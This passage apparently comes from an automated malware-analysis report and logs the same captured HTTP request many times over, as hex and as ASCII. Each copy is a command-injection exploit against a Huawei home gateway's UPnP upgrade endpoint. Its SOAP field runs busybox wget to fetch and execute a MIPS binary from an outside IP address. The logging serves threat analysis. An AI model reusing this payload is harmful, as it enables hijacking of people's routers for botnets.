6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 